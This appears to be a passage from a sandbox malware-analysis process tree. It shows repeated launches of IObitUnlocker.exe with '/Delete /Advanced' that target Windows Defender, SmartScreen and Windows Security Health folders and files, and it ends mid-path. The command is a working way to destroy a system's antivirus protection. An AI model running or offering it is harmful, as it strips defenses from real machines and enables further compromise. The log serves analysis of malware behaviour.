                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                            PID:6408
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                              PID:6728
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                PID:6868
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                  PID:3916
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                    PID:6252
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6660
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7156
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6324
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                            PID:6696
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                              PID:6540
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 